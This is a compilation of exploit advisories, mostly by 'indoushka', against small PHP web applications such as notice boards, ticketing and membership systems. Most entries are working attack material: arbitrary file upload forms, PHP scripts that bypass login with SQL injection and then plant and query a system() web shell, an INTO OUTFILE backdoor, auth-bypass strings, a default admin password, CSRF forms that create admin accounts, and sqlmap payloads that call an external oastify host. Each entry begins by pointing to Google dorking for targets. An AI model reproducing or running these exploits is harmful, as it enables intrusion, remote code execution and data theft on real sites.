<pre><code>=============================================================================================================================================<br />| # Title : Online Notice Board System project 1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/php/7394/online-notice-board-system |<br />=============================================================================================================================================<br /><br />POC :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] Go to the line 10.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Update Profile Picture</title><br /></head><br /><body><br /> <h2>Update Profile Picture</h2><br /> <form action="http://127.0.0.1/Online%20Notice%20Board%20System/user/index.php?page=update_profile_pic" method="POST" enctype="multipart/form-data"><br /> <!-- File input --><br /> <label for="f">Choose a profile picture:</label><br /> <input type="file" id="f" name="f" required><br><br><br /><br /> <!-- Submit button --><br /> <input type="submit" name="update" value="Update Profile Picture"><br /> </form><br /></body><br /></html><br /><br />[+] http://127.0.0.1/Online%20Notice%20Board%20System/images/webadmin.php<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : online bus ticket booking Website v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_online-bus-ticket-booking-.zip |<br />=============================================================================================================================================<br /><br />POC :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] Go to the line 11.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Company Form</title><br /></head><br /><body><br /><br /> <!-- Form for company details --><br /> <form name="" action="http://127.0.0.1/online-bus-ticket-booking-Website/admin_companylist.php" method="POST" enctype="multipart/form-data"><br /> <br /> <!-- File input for logo --><br /> <label for="logo">Company Logo:</label><br /> <input type="file" id="logo" name="logo"><br /> <br><br /><br /> <!-- Submit button for update --><br /> <input type="submit" name="update" value="Update"><br /> <br /> </form><br /><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Old Age Home Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// المكتبات المطلوبة<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// تحديد URL ثابت<br />$url = 'http://localhost/oahms/';<br /><br />// مسار ثابت لرفع الملف<br />$path = 'C:\www\oahms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// حمولة الباب الخلفي<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// إرسال ملف PHP يحتوي على الباب الخلفي<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'submit' => ''<br />];<br />send_request($url . "/admin/login.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Membership Management System version 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://codeastro.com/membership-management-system-in-php-with-source-code/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 20 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// Function to generate a random string of a given length<br />function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {<br /> return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size);<br />}<br /><br />// Generating a random web shell file<br />$shellFile = randomGen() . ".php";<br /><br />// Creating a payload for the login<br />$payload = [<br /> 'email' => "test@mail.com' or 0=0 #", // Adjust based on the target<br /> 'password' => 'a',<br /> 'login' => ''<br />];<br /><br />$session = curl_init();<br /><br />// Target base URL (change this to your target IP or domain)<br />$urlBase = "http://127.0.0.1/Membership/";<br /><br />// Login<br />$url = $urlBase . "index.php";<br />echo "=== Executing SQL Injection ===\n";<br /><br />// Set cURL options for the POST request<br />curl_setopt($session, CURLOPT_URL, $url);<br />curl_setopt($session, CURLOPT_POST, 1);<br />curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));<br />curl_setopt($session, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($session, CURLOPT_HEADER, true); // Include header in output<br />curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);<br />curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging<br /><br />// Execute the login request<br />$response = curl_exec($session);<br /><br />// Separate headers from body<br />$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);<br />$headers = substr($response, 0, $header_size);<br />$body = substr($response, $header_size);<br /><br />// Check if 'Set-Cookie' header is present in the headers<br />preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);<br />$cookie = '';<br />if (isset($matches[1][0])) {<br /> $cookie = $matches[1][0];<br />}<br /><br />// Print headers for debugging<br />echo "=== Response Headers ===\n";<br />echo $headers;<br /><br />if ($cookie) {<br /> echo "=== Authenticated admin cookie: " . $cookie . " ===\n";<br />} else {<br /> echo "Set-Cookie header not found in the response.\n";<br /> exit();<br />}<br /><br />// Prepare to upload shell<br />$url = $urlBase . "settings.php";<br /><br />// Get user input for the command to execute<br />echo "Enter the command to execute: ";<br />$cmd_input = trim(fgets(STDIN));<br /><br />// PHP code to execute the command received from the user<br />$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";<br /><br />// Prepare the multipart/form-data<br />$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));<br />$body = "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";<br />$body .= "Membership System\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";<br />$body .= "$\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";<br />$body .= 'Content-Type: application/x-php' . "\r\n\r\n";<br />$body .= $php_code . "\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";<br />$body .= "\r\n";<br />$body .= "--$boundary--\r\n";<br /><br />// Set cURL options for file upload<br />curl_setopt($session, CURLOPT_URL, $url);<br />curl_setopt($session, CURLOPT_POST, 1);<br />curl_setopt($session, CURLOPT_POSTFIELDS, $body);<br />curl_setopt($session, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: multipart/form-data; boundary=' . $boundary,<br /> 'Cookie: ' . $cookie<br />]);<br /><br />echo "=== Logging in and uploading shell " . $shellFile . " ===\n";<br /><br />// Execute the upload request<br />$response = curl_exec($session);<br /><br />// Close cURL session<br />curl_close($session);<br /><br />// Curl the shell for testing<br />$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);<br />echo "=== Issuing the command: " . $requestUrl . " ===\n";<br /><br />echo "=== CURL OUTPUT ===\n";<br />echo file_get_contents($requestUrl);<br />?><br /><br />[+] <br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Live Membership Management System version 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/php/12997/live-membership-system-in-php-php-project-source-code |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 20 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// Function to generate a random string of a given length<br />function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {<br /> return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size);<br />}<br /><br />// Generating a random web shell file<br />$shellFile = randomGen() . ".php";<br /><br />// Creating a payload for the login<br />$payload = [<br /> 'email' => "test@mail.com' or 0=0 #", // Adjust based on the target<br /> 'password' => 'a',<br /> 'login' => ''<br />];<br /><br />$session = curl_init();<br /><br />// Target base URL (change this to your target IP or domain)<br />$urlBase = "http://127.0.0.1/Membership/";<br /><br />// Login<br />$url = $urlBase . "index.php";<br />echo "=== Executing SQL Injection ===\n";<br /><br />// Set cURL options for the POST request<br />curl_setopt($session, CURLOPT_URL, $url);<br />curl_setopt($session, CURLOPT_POST, 1);<br />curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));<br />curl_setopt($session, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($session, CURLOPT_HEADER, true); // Include header in output<br />curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);<br />curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging<br /><br />// Execute the login request<br />$response = curl_exec($session);<br /><br />// Separate headers from body<br />$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);<br />$headers = substr($response, 0, $header_size);<br />$body = substr($response, $header_size);<br /><br />// Check if 'Set-Cookie' header is present in the headers<br />preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);<br />$cookie = '';<br />if (isset($matches[1][0])) {<br /> $cookie = $matches[1][0];<br />}<br /><br />// Print headers for debugging<br />echo "=== Response Headers ===\n";<br />echo $headers;<br /><br />if ($cookie) {<br /> echo "=== Authenticated admin cookie: " . $cookie . " ===\n";<br />} else {<br /> echo "Set-Cookie header not found in the response.\n";<br /> exit();<br />}<br /><br />// Prepare to upload shell<br />$url = $urlBase . "settings.php";<br /><br />// Get user input for the command to execute<br />echo "Enter the command to execute: ";<br />$cmd_input = trim(fgets(STDIN));<br /><br />// PHP code to execute the command received from the user<br />$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";<br /><br />// Prepare the multipart/form-data<br />$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));<br />$body = "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";<br />$body .= "Membership System\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";<br />$body .= "$\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";<br />$body .= 'Content-Type: application/x-php' . "\r\n\r\n";<br />$body .= $php_code . "\r\n";<br />$body .= "--$boundary\r\n";<br />$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";<br />$body .= "\r\n";<br />$body .= "--$boundary--\r\n";<br /><br />// Set cURL options for file upload<br />curl_setopt($session, CURLOPT_URL, $url);<br />curl_setopt($session, CURLOPT_POST, 1);<br />curl_setopt($session, CURLOPT_POSTFIELDS, $body);<br />curl_setopt($session, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: multipart/form-data; boundary=' . $boundary,<br /> 'Cookie: ' . $cookie<br />]);<br /><br />echo "=== Logging in and uploading shell " . $shellFile . " ===\n";<br /><br />// Execute the upload request<br />$response = curl_exec($session);<br /><br />// Close cURL session<br />curl_close($session);<br /><br />// Curl the shell for testing<br />$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);<br />echo "=== Issuing the command: " . $requestUrl . " ===\n";<br /><br />echo "=== CURL OUTPUT ===\n";<br />echo file_get_contents($requestUrl);<br />?><br /><br />[+] <br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Expense Management System v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_expensemanagement-zip.zip |<br />=============================================================================================================================================<br /><br />POC :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] Go to the line 11.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Sign Up Form</title><br /></head><br /><body><br /><br /> <!-- Sign Up Form --><br /> <form action="http://127.0.0.1/ExpenseManagement/templates/2-sign-up.php" method="POST" enctype="multipart/form-data"><br /> <br /> <!-- File input --><br /> <label for="inpFile">Upload File:</label><br /> <input type="file" id="inpFile" name="inpFile"><br /> <br><br /><br /> <!-- Full name input --><br /> <label for="full_name">Full Name:</label><br /> <input type="text" id="full_name" name="full_name"><br /> <br><br /><br /> <!-- Email input --><br /> <label for="email">Email:</label><br /> <input type="email" id="email" name="email"><br /> <br><br /><br /> <!-- Username input --><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username"><br /> <br><br /><br /> <!-- Password input --><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password"><br /> <br><br /><br /> <!-- Confirm password input --><br /> <label for="password_confirm">Confirm Password:</label><br /> <input type="password" id="password_confirm" name="password_confirm"><br /> <br><br /><br /> <!-- Submit button --><br /> <input type="submit" name="register" value="Register"><br /><br /> </form><br /><br /></body><br /></html><br /><br />[+] http://127.0.0.1/ExpenseManagement/static/profileImages/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Beauty Parlour & Saloon Management System 1.1 Auth By PAss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : u&p = ' or 0=0 ##<br /><br />[+] http://127.0.0.1/studentms/admin/login.php <br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Auto/Taxi Stand Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/blms/banker/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>## Titles: SFTRS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi<br />### Bonus: FU + RCE & XSS - Information disclosure<br />## Author: nu11secur1ty<br />## Date: 09/14/2024<br />## Vendor: https://github.com/oretnom23<br />## Software:<br />https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `password` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select load_file('\\\\<br />wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submitted<br />in the password parameter. This payload injects a SQL sub-query that calls<br />MySQL's load_file function with a UNC file path that references a URL on an<br />external domain. The application interacted with that domain, indicating<br />that the injected SQL query was executed. The attacker can get all the<br />information from the database of this system, and he can do very malicious<br />action against the owner of this application!<br /><br />STATUS: HIGH- Vulnerability for deprecation!<br />WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!<br />https://github.com/oretnom23<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: password (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\<br />wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT<br />9033=9033 AND ('ehPW'='ehPW<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\<br />wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT<br />4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT<br />(ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\<br />wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT<br />1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)<br /><br />## Proof and Exploit:<br />[href](<br />https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html<br />)<br /><br />## Time spent:<br />00:17:00<br /><br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Reservation Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /> <br />[+] Line 8 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><div class="modal-content"><br /> <div class="modal-header"><br /> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button><br /> <h4 class="modal-title">Add New Menu</h4><br /> </div><br /> <div class="modal-body"><br /> <!--start form--><br /> <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data"><br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Menu Name</label><br /> <div class="col-lg-8"> <br /> <input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required=""><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Category</label><br /> <div class="col-lg-8"> <br /> <select class="form-control select2" id="exampleSelect1" name="cat" required=""><br /> <option value="9">Dessert</option><br /> <option value="6">Main Course</option><br /> <option value="7">Pasta</option><br /> <option value="10">Rice</option><br /> </select><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Subcategory</label><br /> <div class="col-lg-8"> <br /> <select class="form-control select2" id="exampleSelect1" name="subcat"><br /> <option>Drinks</option><br /> <option>Lunch and Dinner</option><br /> <option>Mirienda</option><br /> <option>Non Combo Meal</option><br /> </select><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Description</label><br /> <div class="col-lg-8"> <br /> <textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Price</label><br /> <div class="col-lg-8"> <br /> <input type="text" class="form-control" name="price" id="title" placeholder="Price" required=""><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Image</label><br /> <div class="col-lg-8"> <br /> <input type="file" class="form-control" name="image" id="title"><br /> </div><br /> </div> <br /><br /> <!-- Buttons --><br /> <div class="form-group"><br /> <!-- Buttons --><br /> <div class="col-lg-offset-2 col-lg-6"><br /> <button type="submit" class="btn btn-sm btn-primary">Save</button><br /> <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button><br /> </div><br /> </div><br /> </form><br /> <!--end form--><br /> </div><br /> <br /> </div><br /> <br />[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php<br /><br />-----------[+] Part 02 Add Admin [+]-------------------<br /><br />[+] Line 8 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><div class="modal-content"><br /> <div class="modal-header"><br /> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button><br /> <h4 class="modal-title">Add New User</h4><br /> </div><br /> <div class="modal-body"><br /> <!--start form--><br /> <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php"><br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Full Name</label><br /> <div class="col-lg-8"> <br /> <input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required=""><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="username">Username</label><br /> <div class="col-lg-8"> <br /> <input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required=""><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="password">Password</label><br /> <div class="col-lg-8"> <br /> <input type="password" class="form-control" name="password" id="password" placeholder="Write password" required=""><br /> </div><br /> </div> <br /> <br /> <!-- Buttons --><br /> <div class="form-group"><br /> <!-- Buttons --><br /> <div class="col-lg-offset-2 col-lg-6"><br /> <button type="submit" class="btn btn-sm btn-primary">Save</button><br /> <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button><br /> </div><br /> </div><br /> </form><br /> <!--end form--><br /> </div><br /> <br /> </div><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>